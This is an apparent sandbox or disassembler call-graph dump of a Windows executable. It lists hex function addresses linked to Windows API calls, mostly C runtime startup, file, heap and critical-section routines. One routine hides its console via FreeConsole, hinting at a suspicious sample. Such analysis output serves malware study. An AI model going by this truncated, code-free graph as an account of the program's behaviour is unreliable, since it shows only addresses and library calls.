20962->20967 20963 cd56b7 14 API calls 20963->20926 20968 ce2fc8 20964->20968 20969 ce31e2 20965->20969 20966->20970 20967->20960 20972 cd1327 14 API calls 20968->20972 20973 cd1327 14 API calls 20969->20973 20982 ce01bf 20970->20982 20971->20978 20972->20978 20973->20978 20991 ce32a5 20974->20991 20975->20978 21004 ce3549 20975->21004 20978->20963 21016 cdd03b LeaveCriticalSection 20979->21016 20981 ce2e9a 20981->20893 20983 ce01cc 20982->20983 20984 ce01d9 20982->20984 20985 cd1314 14 API calls 20983->20985 20986 ce01e5 20984->20986 20987 cd1314 14 API calls 20984->20987 20989 ce01d1 20985->20989 20986->20945 20988 ce0206 20987->20988 20990 cd19ff 29 API calls 20988->20990 20989->20945 20990->20989 21010 ce33fc 20991->21010 20993 cd573f MultiByteToWideChar 20994 ce33b9 20993->20994 20998 ce33c2 GetLastError 20994->20998 21001 ce32ed 20994->21001 20995 ce3347 21002 ce3301 20995->21002 21003 cdc112 31 API calls 20995->21003 20996 ce3337 20999 cd1314 14 API calls 20996->20999 21000 cd133a 14 API calls 20998->21000 20999->21001 21000->21001 21001->20978 21002->20993 21003->21002 21005 ce3583 21004->21005 21006 ce3619 ReadFile 21005->21006 21007 ce3614 21005->21007 21006->21007 21008 ce3636 21006->21008 21007->20978 21008->21007 21009 cdc112 31 API calls 21008->21009 21009->21007 21011 ce3430 21010->21011 21012 ce34a1 ReadFile 21011->21012 21013 ce32bc 21011->21013 21012->21013 21014 ce34ba 21012->21014 21013->20995 21013->20996 21013->21001 21013->21002 21014->21013 21015 cdc112 31 API calls 21014->21015 21015->21013 21016->20981 21019 cd8d25 21017->21019 21028 cd8d35 21017->21028 21018 cd8d5a 21021 cd8d8e 21018->21021 21022 cd8d6b 21018->21022 21019->21018 21020 ccd5c0 48 API calls 21019->21020 21019->21028 21020->21018 21024 cd8e0a 21021->21024 21026 cd8db6 21021->21026 21021->21028 21029 ce1d02 21022->21029 21025 cd573f MultiByteToWideChar 21024->21025 21025->21028 21027 cd573f MultiByteToWideChar 21026->21027 21026->21028 21027->21028 21028->20842 21032 ce3ea3 21029->21032 21035 ce3ed1 21032->21035 21033 cc71d1 5 API calls 21034 ce1d1d 21033->21034 21034->21028 21035->21033 21036->20827 21037->20741 21039 cd25af 21038->21039 21040 cd25c4 21038->21040 21041 cd1314 14 API calls 21039->21041 21042 cd25d3 21040->21042 21044 cdde73 43 API calls 21040->21044 21043 cd25b4 21041->21043 21042->20750 21045 cd19ff 29 API calls 21043->21045 21046 cd25d0 21044->21046 21047 cd25bf 21045->21047 21046->20750 21047->20750 21051 ccd153 LeaveCriticalSection 21048->21051 21050 cd25a1 21050->20753 21051->21050 21053 cc90e3 21052->21053 21054 cc9053 21052->21054 21056 cc57b0 30 API calls 21053->21056 21055 cc5850 5 API calls 21054->21055 21057 cc9065 21055->21057 21058 cc90e8 21056->21058 21059 cc2b20 30 API calls 21057->21059 21060 cc9070 21059->21060 21061 cc2350 29 API calls 21060->21061 21062 cc90b1 21060->21062 21061->21062 21062->20757 21063->20768 21065 cd39b2 21064->21065 21067 cd3a22 21064->21067 21066 cd8e44 29 API calls 21065->21066 21071 cd39b8 21066->21071 21068 cdf40f 14 API calls 21067->21068 21069 cd3967 21067->21069 21068->21069 21075 cd3992 21069->21075 21070 cd3a0a 21072 cd1314 14 API calls 21070->21072 21071->21067 21071->21070 21073 cd3a0f 21072->21073 21074 cd19ff 29 API calls 21073->21074 21074->21069 21078 ccd153 LeaveCriticalSection 21075->21078 21077 cd3998 21077->20772 21078->21077 19393 cd7041 19394 cd705c 19393->19394 19405 cd1d11 EnterCriticalSection 19394->19405 19396 cd7063 19406 cdcf7a 19396->19406 19399 cd7081 19425 cd70a7 19399->19425 19404 cd7192 2 API calls 19404->19399 19405->19396 19407 cdcf86 19406->19407 19408 cdcf8f 19407->19408 19409 cdcfb0 19407->19409 19411 cd1314 14 API calls 19408->19411 19428 cd1d11 EnterCriticalSection 19409->19428 19412 cdcf94 19411->19412 19413 cd19ff 29 API calls 19412->19413 19415 cd7072 19413->19415 19414 cdcfe8 19436 cdd00f 19414->19436 19415->19399 19419 cd70dc GetStartupInfoW 19415->19419 19416 cdcfbc 19416->19414 19429 cdceca 19416->19429 19420 cd70f9 19419->19420 19421 cd707c 19419->19421 19420->19421 19422 cdcf7a 30 API calls 19420->19422 19421->19404 19423 cd7121 19422->19423 19423->19421 19424 cd7151 GetFileType 19423->19424 19424->19423 19440 cd1d28 LeaveCriticalSection 19425->19440 19427 cd7092 19428->19416 19430 cd69f4 14 API calls 19429->19430 19431 cdcedc 19430->19431 19434 cd6470 6 API calls 19431->19434 19435 cdcee9 19431->19435 19432 cd56b7 14 API calls 19433 cdcf3e 19432->19433 19433->19416 19434->19431 19435->19432 19439 cd1d28 LeaveCriticalSection 19436->19439 19438 cdd016 19438->19415 19439->19438 19440->19427 19441 ccd240 19442 cd217a 77 API calls 19441->19442 19443 ccd248 19442->19443 19451 cd7ef2 19443->19451 19445 ccd24d 19446 cd7f9d 14 API calls 19445->19446 19447 ccd25c DeleteCriticalSection 19446->19447 19447->19445 19448 ccd277 19447->19448 19449 cd56b7 14 API calls 19448->19449 19450 ccd282 19449->19450 19452 cd7efe 19451->19452 19461 cd1d11 EnterCriticalSection 19452->19461 19454 cd7f75 19466 cd7f94 19454->19466 19456 cd7f49 DeleteCriticalSection 19460 cd56b7 14 API calls 19456->19460 19457 cd7f09 19457->19454 19457->19456 19462 cd1fd2 19457->19462 19460->19457 19461->19457 19463 cd1fe5 19462->19463 19469 cd2090 19463->19469 19465 cd1ff1 19465->19457 19541 cd1d28 LeaveCriticalSection 19466->19541 19468 cd7f81 19468->19445 19470 cd209c 19469->19470 19471 cd20c9 19470->19471 19472 cd20a6 19470->19472 19479 cd20c1 19471->19479 19480 ccd13f EnterCriticalSection 19471->19480 19473 cd1ba8 29 API calls 19472->19473 19473->19479 19475 cd20e7 19481 cd2002 19475->19481 19477 cd20f4 19495 cd211f 19477->19495 19479->19465 19480->19475 19482 cd200f 19481->19482 19483 cd2032 19481->19483 19484 cd1ba8 29 API calls 19482->19484 19485 cd21e8 73 API calls 19483->19485 19493 cd202a 19483->19493 19484->19493 19486 cd204a 19485->19486 19487 cd7f9d 14 API calls 19486->19487 19488 cd2052 19487->19488 19489 cd8e44 29 API calls 19488->19489 19490 cd205e 19489->19490 19498 cdd116 19490->19498 19493->19477 19494 cd56b7 14 API calls 19494->19493 19540 ccd153 LeaveCriticalSection 19495->19540 19497 cd2125 19497->19479 19499 cdd13f 19498->19499 19500 cd2065 19498->19500 19501 cdd18e 19499->19501 19503 cdd166 19499->19503 19500->19493 19500->19494 19502 cd1ba8 29 API calls 19501->19502 19502->19500 19505 cdd1b9 19503->19505 19506 cdd1c5 19505->19506 19513 cdd018 EnterCriticalSection 19506->19513 19508 cdd1d3 19509 cdd204 19508->19509 19514 cdd076 19508->19514 19527 cdd23e 19509->19527 19513->19508 19515 cdcdcf 29 API calls 19514->19515 19517 cdd086 19515->19517 19516 cdd08c 19530 cdce39 19516->19530 19517->19516 19519 cdcdcf 29 API calls 19517->19519 19525 cdd0be 19517->19525 19521 cdd0b5 19519->19521 19520 cdcdcf 29 API calls 19522 cdd0ca CloseHandle 19520->19522 19523 cdcdcf 29 API calls 19521->19523 19522->19516 19524 cdd0d6 GetLastError 19522->19524 19523->19525 19524->19516 19525->19516 19525->19520 19526 cdd0e4 19526->19509 19539 cdd03b LeaveCriticalSection 19527->19539 19529 cdd227 19529->19500 19531 cdceaf 19530->19531 19534 cdce48 19530->19534 19532 cd1314 14 API calls 19531->19532 19533 cdceb4 19532->19533 19535 cd1327 14 API calls 19533->19535 19534->19531 19538 cdce72 19534->19538 19536 cdce9f 19535->19536 19536->19526 19537 cdce99 SetStdHandle 19537->19536 19538->19536 19538->19537 19539->19529 19540->19497 19541->19468 21160 cc8b50 21161 cc8b8e 21160->21161 21162 cc8b59 21160->21162 21162->21161 21165 cd2127 21162->21165 21164 cc8b81 21166 cd2139 21165->21166 21169 cd2142 21165->21169 21167 cd22a5 77 API calls 21166->21167 21168 cd213f 21167->21168 21168->21164 21170 cd2151 21169->21170 21173 cd242a 21169->21173 21170->21164 21174 cd2436 21173->21174 21181 ccd13f EnterCriticalSection 21174->21181 21176 cd2444 21177 cd2183 77 API calls 21176->21177 21178 cd2455 21177->21178 21182 cd247e 21178->21182 21181->21176 21185 ccd153 LeaveCriticalSection 21182->21185 21184 cd2178 21184->21164 21185->21184 16851 cca152 16852 cca15e 16851->16852 16877 cc73ba 16852->16877 16854 cca165 16855 cca2be 16854->16855 16864 cca18f 16854->16864 16915 cc9a73 IsProcessorFeaturePresent 16855->16915 16857 cca2c5 16897 ccf179 16857->16897 16860 ccf18f 21 API calls 16861 cca2d3 16860->16861 16862 cca1ae 16863 cca22f 16888 cd16ec 16863->16888 16864->16862 16864->16863 16900 ccf1c3 16864->16900 16867 cca235 16892 cc20c0 GetModuleHandleA GetProcAddress FreeConsole 16867->16892 16870 cc9a20 GetModuleHandleW 16871 cca256 16870->16871 16871->16857 16872 cca25a 16871->16872 16873 cca263 16872->16873 16906 ccf1a5 16872->16906 16909 cc73f3 16873->16909 16878 cc73c3 16877->16878 16919 cc96db IsProcessorFeaturePresent 16878->16919 16882 cc73d4 16883 cc73d8 16882->16883 16929 ccd0a0 16882->16929 16883->16854 16886 cc73ef 16886->16854 16889 cd16f5 16888->16889 16891 cd16fa 16888->16891 17001 cd1815 16889->17001 16891->16867 17885 cc20b0 16892->17885 16895 cc71d1 5 API calls 16896 cc2126 16895->16896 16896->16870 16898 ccf2c4 21 API calls 16897->16898 16899 cca2cb 16898->16899 16899->16860 16901 ccf1d9 16900->16901 16901->16863 16902 cd594a 48 API calls 16901->16902 16903 cd38fc 16902->16903 16904 cd1f83 48 API calls 16903->16904 16905 cd3926 16904->16905 16907 ccf2c4 21 API calls 16906->16907 16908 ccf1b0 16907->16908 16908->16873 16910 cc73ff 16909->16910 16911 cc7415 16910->16911 18296 ccd0b2 16910->18296 16911->16862 16913 cc740d 16914 ccab4e 7 API calls 16913->16914 16914->16911 16916 cc9a89 16915->16916 16917 cc9b34 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16916->16917 16918 cc9b78 16917->16918 16918->16857 16920 cc73cf 16919->16920 16921 ccab2f 16920->16921 16938 cd5386 16921->16938 16925 ccab40 16926 ccab4b 16925->16926 16952 cd53c2 16925->16952 16926->16882 16928 ccab38 16928->16882 16992 cd7a29 16929->16992 16932 ccab4e 16933 ccab57 16932->16933 16934 ccab61 16932->16934 16935 cd4444 6 API calls 16933->16935 16934->16883 16936 ccab5c 16935->16936 16937 cd53c2 DeleteCriticalSection 16936->16937 16937->16934 16939 cd538f 16938->16939 16941 cd53b8 16939->16941 16942 ccab34 16939->16942 16956 cdf669 16939->16956 16943 cd53c2 DeleteCriticalSection 16941->16943 16942->16928 16944 cd4411 16942->16944 16943->16942 16973 cdf57a 16944->16973 16947 cd4426 16947->16925 16950 cd4441 16950->16925 16953 cd53ec 16952->16953 16954 cd53cd 16952->16954 16953->16928 16955 cd53d7 DeleteCriticalSection 16954->16955 16955->16953 16955->16955 16961 cdf6fb 16956->16961 16959 cdf6a1 InitializeCriticalSectionAndSpinCount 16960 cdf68c 16959->16960 16960->16939 16962 cdf683 16961->16962 16965 cdf71c 16961->16965 16962->16959 16962->16960 16963 cdf784 GetProcAddress 16963->16962 16965->16962 16965->16963 16966 cdf775 16965->16966 16968 cdf6b0 LoadLibraryExW 16965->16968 16966->16963 16967 cdf77d FreeLibrary 16966->16967 16967->16963 16969 cdf6f7 16968->16969 16970 cdf6c7 GetLastError 16968->16970 16969->16965 16970->16969 16971 cdf6d2 16970->16971 16971->16969 16972 cdf6e8 LoadLibraryExW 16971->16972 16972->16965 16974 cdf6fb 5 API calls 16973->16974 16975 cdf594 16974->16975 16976 cdf5ad TlsAlloc 16975->16976 16977 cd441b 16975->16977 16977->16947 16978 cdf62b 16977->16978 16979 cdf6fb 5 API calls 16978->16979 16980 cdf645 16979->16980 16981 cd4434 16980->16981 16982 cdf660 TlsSetValue 16980->16982 16981->16950 16983 cd4444 16981->16983 16982->16981 16984 cd4454 16983->16984 16985 cd444e 16983->16985 16984->16947 16987 cdf5b5 16985->16987 16988 cdf6fb 5 API calls 16987->16988 16989 cdf5cf 16988->16989 16990 cdf5e7 TlsFree 16989->16990 16991 cdf5db 16989->16991 16990->16991 16991->16984 16993 cd7a39 16992->16993 16994 cc73e1 16992->16994 16993->16994 16996 cd7192 16993->16996 16994->16886 16994->16932 16998 cd7199 16996->16998 16997 cd71dc GetStdHandle 16997->16998 16998->16997 16999 cd723e 16998->16999 17000 cd71ef GetFileType 16998->17000 16999->16993 17000->16998 17002 cd181e 17001->17002 17003 cd1834 17001->17003 17002->17003 17007 cd1756 17002->17007 17003->16891 17005 cd182b 17005->17003 17024 cd1923 17005->17024 17008 cd175f 17007->17008 17009 cd1762 17007->17009 17008->17005 17033 cd7260 17009->17033 17014 cd177f 17060 cd1841 17014->17060 17015 cd1773 17016 cd56b7 14 API calls 17015->17016 17018 cd1779 17016->17018 17018->17005 17020 cd56b7 14 API calls 17021 cd17a3 17020->17021 17022 cd56b7 14 API calls 17021->17022 17023 cd17a9 17022->17023 17023->17005 17025 cd1994 17024->17025 17028 cd1932 17024->17028 17025->17003 17026 cd5801 WideCharToMultiByte 17026->17028 17027 cd69f4 14 API calls 17027->17028 17028->17025 17028->17026 17028->17027 17029 cd1998 17028->17029 17032 cd56b7 14 API calls 17028->17032 17604 cdca45 17028->17604 17030 cd56b7 14 API calls 17029->17030 17030->17025 17032->17028 17034 cd7269 17033->17034 17035 cd1768 17033->17035 17082 cd5a05 17034->17082 17039 cdc96e GetEnvironmentStringsW 17035->17039 17040 cdc986 17039->17040 17053 cd176d 17039->17053 17041 cd5801 WideCharToMultiByte 17040->17041 17042 cdc9a3 17041->17042 17043 cdc9ad FreeEnvironmentStringsW 17042->17043 17044 cdc9b8 17042->17044 17043->17053 17045 cd56f1 15 API calls 17044->17045 17046 cdc9bf 17045->17046 17047 cdc9d8 17046->17047 17048 cdc9c7 17046->17048 17049 cd5801 WideCharToMultiByte 17047->17049 17050 cd56b7 14 API calls 17048->17050 17051 cdc9e8 17049->17051 17052 cdc9cc FreeEnvironmentStringsW 17050->17052 17054 cdc9ef 17051->17054 17055 cdc9f7 17051->17055 17052->17053 17053->17014 17053->17015 17056 cd56b7 14 API calls 17054->17056 17057 cd56b7 14 API calls 17055->17057 17058 cdc9f5 FreeEnvironmentStringsW 17056->17058 17057->17058 17058->17053 17061 cd1856 17060->17061 17062 cd69f4 14 API calls 17061->17062 17063 cd187d 17062->17063 17064 cd188f 17063->17064 17065 cd1885 17063->17065 17068 cd18ec 17064->17068 17070 cd69f4 14 API calls 17064->17070 17071 cd18fb 17064->17071 17075 cd1916 17064->17075 17077 cd56b7 14 API calls 17064->17077 17585 cd532c 17064->17585 17066 cd56b7 14 API calls 17065->17066 17067 cd1786 17066->17067 17067->17020 17069 cd56b7 14 API calls 17068->17069 17069->17067 17070->17064 17594 cd17e6 17071->17594 17600 cd1a2c IsProcessorFeaturePresent 17075->17600 17076 cd56b7 14 API calls 17079 cd1908 17076->17079 17077->17064 17080 cd56b7 14 API calls 17079->17080 17080->17067 17081 cd1922 17083 cd5a16 17082->17083 17084 cd5a10 17082->17084 17088 cd5a1c 17083->17088 17137 cd63b3 17083->17137 17132 cd6374 17084->17132 17092 cd5a21 17088->17092 17154 cd1f83 17088->17154 17089 cd5a34 17142 cd69f4 17089->17142 17110 cd7621 17092->17110 17095 cd5a5d 17098 cd63b3 6 API calls 17095->17098 17096 cd5a48 17097 cd63b3 6 API calls 17096->17097 17099 cd5a54 17097->17099 17100 cd5a69 17098->17100 17104 cd56b7 14 API calls 17099->17104 17101 cd5a6d 17100->17101 17102 cd5a7c 17100->17102 17105 cd63b3 6 API calls 17101->17105 17149 cd5c5c 17102->17149 17107 cd5a5a 17104->17107 17105->17099 17107->17088 17108 cd56b7 14 API calls 17109 cd5a8e 17108->17109 17109->17092 17111 cd764b 17110->17111 17406 cd74ad 17111->17406 17116 cd767d 17118 cd56b7 14 API calls 17116->17118 17117 cd768b 17420 cd72a8 17117->17420 17120 cd7664 17118->17120 17120->17035 17122 cd76c3 17123 cd1314 14 API calls 17122->17123 17125 cd76c8 17123->17125 17124 cd770a 17127 cd7753 17124->17127 17431 cd79dc 17124->17431 17128 cd56b7 14 API calls 17125->17128 17126 cd76de 17126->17124 17129 cd56b7 14 API calls 17126->17129 17131 cd56b7 14 API calls 17127->17131 17128->17120 17129->17124 17131->17120 17133 cd670d 5 API calls 17132->17133 17134 cd6390 17133->17134 17135 cd6399 17134->17135 17136 cd63ab TlsGetValue 17134->17136 17135->17083 17138 cd670d 5 API calls 17137->17138 17139 cd63cf 17138->17139 17140 cd63ed TlsSetValue 17139->17140 17141 cd5a30 17139->17141 17141->17088 17141->17089 17148 cd6a01 17142->17148 17143 cd6a41 17145 cd1314 13 API calls 17143->17145 17144 cd6a2c HeapAlloc 17146 cd5a40 17144->17146 17144->17148 17145->17146 17146->17095 17146->17096 17148->17143 17148->17144 17163 ccf4ab 17148->17163 17177 cd5dc2 17149->17177 17279 cd7ae0 17154->17279 17157 cd1f9d IsProcessorFeaturePresent 17161 cd1f88 17157->17161 17158 ccf18f 21 API calls 17158->17161 17161->17154 17161->17157 17161->17158 17162 cd446c 17161->17162 17282 cd7b07 17161->17282 17309 cd1a60 17161->17309 17315 cd446d 17161->17315 17166 ccf4e6 17163->17166 17167 ccf4f2 17166->17167 17172 cd1d11 EnterCriticalSection 17167->17172 17169 ccf4fd 17173 ccf534 17169->17173 17172->17169 17176 cd1d28 LeaveCriticalSection 17173->17176 17175 ccf4b6 17175->17148 17176->17175 17178 cd5dce 17177->17178 17191 cd1d11 EnterCriticalSection 17178->17191 17180 cd5dd8 17192 cd5e08 17180->17192 17183 cd5e14 17184 cd5e20 17183->17184 17196 cd1d11 EnterCriticalSection 17184->17196 17186 cd5e2a 17197 cd5c11 17186->17197 17188 cd5e42 17201 cd5e62 17188->17201 17191->17180 17195 cd1d28 LeaveCriticalSection 17192->17195 17194 cd5cca 17194->17183 17195->17194 17196->17186 17198 cd5c47 17197->17198 17199 cd5c20 17197->17199 17198->17188 17199->17198 17204 cd9e8a 17199->17204 17278 cd1d28 LeaveCriticalSection 17201->17278 17203 cd5a87 17203->17108 17205 cd9ea0 17204->17205 17206 cd9f0a 17204->17206 17205->17206 17210 cd9ed3 17205->17210 17215 cd56b7 14 API calls 17205->17215 17208 cd56b7 14 API calls 17206->17208 17231 cd9f58 17206->17231 17209 cd9f2c 17208->17209 17211 cd56b7 14 API calls 17209->17211 17212 cd9ef5 17210->17212 17219 cd56b7 14 API calls 17210->17219 17213 cd9f3f 17211->17213 17214 cd56b7 14 API calls 17212->17214 17218 cd56b7 14 API calls 17213->17218 17220 cd9eff 17214->17220 17217 cd9ec8 17215->17217 17216 cd9f66 17221 cd9fc6 17216->17221 17230 cd56b7 14 API calls 17216->17230 17232 cd92e1 17217->17232 17223 cd9f4d 17218->17223 17224 cd9eea 17219->17224 17225 cd56b7 14 API calls 17220->17225 17226 cd56b7 14 API calls 17221->17226 17228 cd56b7 14 API calls 17223->17228 17260 cd95fd 17224->17260 17225->17206 17227 cd9fcc 17226->17227 17227->17198 17228->17231 17230->17216 17272 cda024 17231->17272 17233 cd92f2 17232->17233 17259 cd93db 17232->17259 17234 cd9303 17233->17234 17235 cd56b7 14 API calls 17233->17235 17236 cd9315 17234->17236 17237 cd56b7 14 API calls 17234->17237 17235->17234 17238 cd9327 17236->17238 17240 cd56b7 14 API calls 17236->17240 17237->17236 17239 cd9339 17238->17239 17241 cd56b7 14 API calls 17238->17241 17242 cd934b 17239->17242 17243 cd56b7 14 API calls 17239->17243 17240->17238 17241->17239 17243->17242 17259->17210 17261 cd960a 17260->17261 17271 cd9662 17260->17271 17262 cd961a 17261->17262 17263 cd56b7 14 API calls 17261->17263 17264 cd962c 17262->17264 17265 cd56b7 14 API calls 17262->17265 17263->17262 17266 cd56b7 14 API calls 17264->17266 17267 cd963e 17264->17267 17265->17264 17266->17267 17268 cd9650 17267->17268 17269 cd56b7 14 API calls 17267->17269 17270 cd56b7 14 API calls 17268->17270 17268->17271 17269->17268 17270->17271 17271->17212 17273 cda031 17272->17273 17274 cda050 17272->17274 17273->17274 17275 cd96eb 14 API calls 17273->17275 17274->17216 17276 cda04a 17275->17276 17277 cd56b7 14 API calls 17276->17277 17277->17274 17278->17203 17329 cd7d63 17279->17329 17283 cd7b13 17282->17283 17284 cd5a9b 14 API calls 17283->17284 17285 cd7b63 17283->17285 17286 cd7b75 17283->17286 17291 cd7b44 17283->17291 17284->17291 17287 cd1314 14 API calls 17285->17287 17288 cd7bab 17286->17288 17343 cd1d11 EnterCriticalSection 17286->17343 17289 cd7b68 17287->17289 17294 cd7be8 17288->17294 17295 cd7ce5 17288->17295 17305 cd7c16 17288->17305 17340 cd19ff 17289->17340 17291->17285 17291->17286 17308 cd7b4d 17291->17308 17294->17305 17344 cd594a GetLastError 17294->17344 17297 cd7cf0 17295->17297 17375 cd1d28 LeaveCriticalSection 17295->17375 17299 ccf18f 21 API calls 17297->17299 17301 cd7cf8 17299->17301 17302 cd594a 48 API calls 17306 cd7c6b 17302->17306 17304 cd594a 48 API calls 17304->17305 17371 cd7c91 17305->17371 17307 cd594a 48 API calls 17306->17307 17306->17308 17307->17308 17308->17161 17310 cd1a7c 17309->17310 17311 cd1aa8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17310->17311 17312 cd1b79 17311->17312 17390 cc71d1 17312->17390 17314 cd1b97 17314->17161 17316 cd4479 GetLastError 17315->17316 17317 cd4476 17315->17317 17398 cdf5f0 17316->17398 17317->17161 17320 cd44f3 SetLastError 17320->17161 17321 cdf62b 6 API calls 17322 cd44a7 17321->17322 17323 cd44cf 17322->17323 17324 cdf62b 6 API calls 17322->17324 17328 cd44ad 17322->17328 17325 cdf62b 6 API calls 17323->17325 17326 cd44e3 17323->17326 17324->17323 17325->17326 17403 cd2a5e 17326->17403 17328->17320 17330 cd7d6f 17329->17330 17335 cd1d11 EnterCriticalSection 17330->17335 17332 cd7d7d 17336 cd7dbf 17332->17336 17335->17332 17339 cd1d28 LeaveCriticalSection 17336->17339 17338 cd7b05 17338->17161 17339->17338 17376 cd1c4e 17340->17376 17342 cd1a0b 17342->17308 17343->17288 17345 cd5966 17344->17345 17346 cd5960 17344->17346 17348 cd63b3 6 API calls 17345->17348 17350 cd596a SetLastError 17345->17350 17347 cd6374 6 API calls 17346->17347 17347->17345 17349 cd5982 17348->17349 17349->17350 17352 cd69f4 14 API calls 17349->17352 17353 cd59ff 17350->17353 17354 cd59fa 17350->17354 17355 cd5997 17352->17355 17356 cd1f83 46 API calls 17353->17356 17354->17304 17357 cd599f 17355->17357 17358 cd59b0 17355->17358 17360 cd5a04 17356->17360 17361 cd63b3 6 API calls 17357->17361 17359 cd63b3 6 API calls 17358->17359 17362 cd59bc 17359->17362 17363 cd59ad 17361->17363 17364 cd59d7 17362->17364 17365 cd59c0 17362->17365 17367 cd56b7 14 API calls 17363->17367 17368 cd5c5c 14 API calls 17364->17368 17366 cd63b3 6 API calls 17365->17366 17366->17363 17367->17350 17369 cd59e2 17368->17369 17370 cd56b7 14 API calls 17369->17370 17370->17350 17372 cd7c95 17371->17372 17373 cd7c5d 17371->17373 17389 cd1d28 LeaveCriticalSection 17372->17389 17373->17302 17373->17306 17373->17308 17375->17297 17377 cd1c60 17376->17377 17380 cd1ba8 17377->17380 17379 cd1c78 17379->17342 17381 cd1bb8 17380->17381 17382 cd1bbf 17380->17382 17383 ccd620 16 API calls 17381->17383 17384 cd1c25 GetLastError SetLastError 17382->17384 17387 cd1bcd 17382->17387 17383->17382 17385 cd1bf4 17384->17385 17386 cd1a2c 11 API calls 17385->17386 17385->17387 17388 cd1c24 17386->17388 17387->17379 17389->17373 17391 cc71d9 17390->17391 17392 cc71da IsProcessorFeaturePresent 17390->17392 17391->17314 17394 cc95cd 17392->17394 17397 cc96b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17394->17397 17396 cc96b0 17396->17314 17397->17396 17399 cdf6fb 5 API calls 17398->17399 17400 cdf60a 17399->17400 17401 cdf622 TlsGetValue 17400->17401 17402 cd448e 17400->17402 17401->17402 17402->17320 17402->17321 17402->17328 17404 cd56b7 14 API calls 17403->17404 17405 cd2a76 17404->17405 17405->17328 17439 ccc7ea 17406->17439 17409 cd74ce GetOEMCP 17411 cd74f7 17409->17411 17410 cd74e0 17410->17411 17412 cd74e5 GetACP 17410->17412 17411->17120 17413 cd56f1 17411->17413 17412->17411 17414 cd572f 17413->17414 17418 cd56ff 17413->17418 17415 cd1314 14 API calls 17414->17415 17417 cd572d 17415->17417 17416 cd571a RtlAllocateHeap 17416->17417 17416->17418 17417->17116 17417->17117 17418->17414 17418->17416 17419 ccf4ab 2 API calls 17418->17419 17419->17418 17421 cd74ad 50 API calls 17420->17421 17422 cd72c8 17421->17422 17423 cd73cd 17422->17423 17424 cd7305 IsValidCodePage 17422->17424 17430 cd7320 17422->17430 17425 cc71d1 5 API calls 17423->17425 17424->17423 17426 cd7317 17424->17426 17427 cd74ab 17425->17427 17428 cd7340 GetCPInfo 17426->17428 17426->17430 17427->17122 17427->17126 17428->17423 17428->17430 17479 cd7837 17430->17479 17432 cd79e8 17431->17432 17559 cd1d11 EnterCriticalSection 17432->17559 17434 cd79f2 17560 cd7776 17434->17560 17440 ccc808 17439->17440 17441 ccc801 17439->17441 17440->17441 17442 cd594a 48 API calls 17440->17442 17441->17409 17441->17410 17443 ccc829 17442->17443 17447 cd5f2e 17443->17447 17448 cd5f41 17447->17448 17450 ccc83f 17447->17450 17448->17450 17455 cda055 17448->17455 17451 cd5f5b 17450->17451 17452 cd5f6e 17451->17452 17454 cd5f83 17451->17454 17452->17454 17476 cd7242 17452->17476 17454->17441 17456 cda061 17455->17456 17457 cd594a 48 API calls 17456->17457 17458 cda06a 17457->17458 17465 cda0b0 17458->17465 17468 cd1d11 EnterCriticalSection 17458->17468 17460 cda088 17469 cda0d6 17460->17469 17465->17450 17466 cd1f83 48 API calls 17467 cda0d5 17466->17467 17468->17460 17470 cda0e4 17469->17470 17472 cda099 17469->17472 17471 cd9e8a 14 API calls 17470->17471 17470->17472 17471->17472 17473 cda0b5 17472->17473 17474 cd1d28 LeaveCriticalSection 17473->17474 17475 cda0ac 17474->17475 17475->17465 17475->17466 17477 cd594a 48 API calls 17476->17477 17478 cd7247 17477->17478 17478->17454 17480 cd785f GetCPInfo 17479->17480 17489 cd7928 17479->17489 17485 cd7877 17480->17485 17480->17489 17482 cc71d1 5 API calls 17484 cd79da 17482->17484 17484->17423 17490 cd6ce0 17485->17490 17489->17482 17491 ccc7ea 48 API calls 17490->17491 17492 cd6d00 17491->17492 17510 cd573f 17492->17510 17494 cd6dbc 17496 cc71d1 5 API calls 17494->17496 17495 cd6db4 17513 cc9f07 17495->17513 17499 cd6ddf 17496->17499 17497 cd6d2d 17497->17494 17497->17495 17498 cd56f1 15 API calls 17497->17498 17501 cd6d52 17497->17501 17498->17501 17505 cd6de1 17499->17505 17501->17495 17502 cd573f MultiByteToWideChar 17501->17502 17503 cd6d9b 17502->17503 17503->17495 17504 cd6da2 GetStringTypeW 17503->17504 17504->17495 17506 ccc7ea 48 API calls 17505->17506 17507 cd6df4 17506->17507 17519 cd6e2a 17507->17519 17517 cd5769 17510->17517 17514 cc9f11 17513->17514 17516 cc9f22 17513->17516 17515 cd2a5e 14 API calls 17514->17515 17514->17516 17515->17516 17516->17494 17518 cd575b MultiByteToWideChar 17517->17518 17518->17497 17520 cd6e45 17519->17520 17521 cd573f MultiByteToWideChar 17520->17521 17525 cd6e89 17521->17525 17559->17434 17570 cd33bb 17560->17570 17562 cd7798 17563 cd33bb 29 API calls 17562->17563 17564 cd77b7 17563->17564 17565 cd77de 17564->17565 17566 cd56b7 14 API calls 17564->17566 17567 cd7a1d 17565->17567 17566->17565 17584 cd1d28 LeaveCriticalSection 17567->17584 17569 cd7a0b 17569->17127 17571 cd33cc 17570->17571 17575 cd33c8 17570->17575 17572 cd33d3 17571->17572 17577 cd33e6 17571->17577 17573 cd1314 14 API calls 17572->17573 17574 cd33d8 17573->17574 17576 cd19ff 29 API calls 17574->17576 17575->17562 17576->17575 17577->17575 17578 cd341d 17577->17578 17579 cd3414 17577->17579 17578->17575 17582 cd1314 14 API calls 17578->17582 17580 cd1314 14 API calls 17579->17580 17581 cd3419 17580->17581 17583 cd19ff 29 API calls 17581->17583 17582->17581 17583->17575 17584->17569 17586 cd5348 17585->17586 17587 cd533a 17585->17587 17588 cd1314 14 API calls 17586->17588 17587->17586 17592 cd5360 17587->17592 17589 cd5350 17588->17589 17590 cd19ff 29 API calls 17589->17590 17591 cd535a 17590->17591 17591->17064 17592->17591 17593 cd1314 14 API calls 17592->17593 17593->17589 17595 cd17f3 17594->17595 17596 cd1810 17594->17596 17597 cd180a 17595->17597 17598 cd56b7 14 API calls 17595->17598 17596->17076 17599 cd56b7 14 API calls 17597->17599 17598->17595 17599->17596 17601 cd1a38 17600->17601 17602 cd1a60 8 API calls 17601->17602 17603 cd1a4d GetCurrentProcess TerminateProcess 17602->17603 17603->17081 17605 cdca50 17604->17605 17606 cdca61 17605->17606 17608 cdca74 17605->17608 17607 cd1314 14 API calls 17606->17607 17617 cdca66 17607->17617 17609 cdcc8b 17608->17609 17610 cdca94 17608->17610 17611 cd1314 14 API calls 17609->17611 17667 